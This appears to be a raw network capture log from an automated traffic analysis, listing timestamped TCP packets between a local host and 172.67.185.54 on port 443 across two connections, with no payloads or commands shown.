                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.791006088 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.791016102 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.875700951 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.875766039 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.875814915 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.875828028 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.875869989 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.875884056 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.907757044 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.907826900 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.907864094 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.907877922 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.907908916 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.907929897 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.908937931 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.909013033 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.909029007 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.909045935 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.909096003 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.909096003 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.023108959 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.023174047 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.023231030 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.023256063 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.023283005 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.023328066 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.025257111 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.025311947 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.025357962 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.025377035 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.025403023 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.025424957 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.109935999 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.109999895 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.110047102 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.110086918 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.110161066 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.110187054 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.141675949 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.141748905 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.141805887 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.141822100 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.141849041 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.141872883 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.142610073 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.142667055 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.142729998 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.142729998 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.142745972 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.142857075 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.257589102 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.257652998 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.257695913 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.257721901 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.257750034 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.257769108 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259028912 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259083986 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259109974 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259123087 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259160995 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259160995 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259589911 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259660006 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259686947 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259699106 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.259727001 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.309614897 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.374231100 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.374295950 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.374324083 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.374340057 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.374383926 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.374383926 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.375667095 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.375720978 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.375765085 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.375782967 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.375803947 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.375828981 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.377046108 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.377099991 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.377142906 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.377160072 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.377187014 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.377207041 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.491671085 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.491734028 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.491792917 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.491826057 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.491854906 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.491889954 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.493366003 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.493391991 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.493452072 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.493468046 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.493521929 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.494102955 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.494127035 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.494179010 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.494193077 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.494221926 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.494251966 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.608344078 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.608405113 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.608514071 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.608537912 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.608612061 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.608612061 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.609683990 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.609756947 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.609786987 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.609800100 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.609827042 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.609844923 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.610872984 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.610929966 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.610971928 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.610985994 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.611015081 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.611032009 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725294113 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725354910 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725500107 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725500107 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725517988 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725552082 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725594044 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725605011 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725619078 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725631952 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725666046 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.725684881 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.727087975 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.727139950 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.727174044 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.727206945 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.727237940 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.727261066 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.805690050 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.805756092 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.805926085 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.805926085 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.806005001 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.806073904 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.842149019 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.842215061 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.842273951 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.842341900 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.842381001 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.842411995 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.843483925 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.843539953 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.843578100 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.843591928 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.843620062 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.843640089 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844162941 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844245911 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844244957 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844305992 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844321966 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844438076 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844508886 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.844556093 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.878531933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.878624916 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.878709078 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.879066944 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:42.879103899 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.502985001 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.503072977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.504679918 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.504702091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.505110979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.506254911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.547331095 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.839900970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840094090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840159893 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840189934 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840220928 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840281010 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840311050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840480089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840532064 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840553045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840647936 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840708971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.840724945 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.891618967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.891639948 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.939630985 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969506025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969707012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969768047 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969784021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969882965 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969943047 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.969957113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970057011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970129967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970141888 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970237970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970290899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970304012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970531940 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970603943 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970616102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970710993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970768929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970781088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970879078 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970933914 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970947027 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971530914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971601963 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971613884 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971709013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971762896 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971775055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.001580000 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.001646042 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.001658916 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.051619053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077359915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077560902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077620983 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077637911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077774048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077831984 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077845097 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077939034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.077996969 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078023911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078107119 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078175068 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078186989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078859091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078895092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078936100 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078958035 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.078980923 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.079010010 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.079068899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.079080105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.079145908 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.079848051 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.079931021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.119923115 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.119997978 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196022034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196105957 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196155071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196239948 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196261883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196325064 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196563005 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196635962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196846008 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.196917057 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.197371960 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.197441101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.197602987 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.197674036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.238648891 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.238761902 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.314318895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.314399004 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.314546108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.314632893 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.315217018 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.315298080 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.315506935 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.315577030 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.315623999 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.315690041 CET49717443192.168.2.16172.67.185.54
